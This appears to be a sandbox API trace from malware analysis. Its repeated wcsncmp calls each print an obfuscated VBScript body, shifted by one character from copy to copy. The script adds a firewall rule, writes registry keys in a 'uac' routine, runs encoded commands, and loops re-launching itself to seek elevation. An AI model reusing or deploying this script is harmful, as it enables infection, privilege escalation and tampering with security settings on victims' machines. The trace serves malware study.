_MaxCount=0x21) returned 25 [0226.374] wcsncmp (_String1=" str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.374] wcsncmp (_String1="str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.374] wcsncmp (_String1="tr1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.374] wcsncmp (_String1="r1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.374] wcsncmp (_String1="1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.374] wcsncmp (_String1=" & \">\"\r\nnewRule.Applicationname = 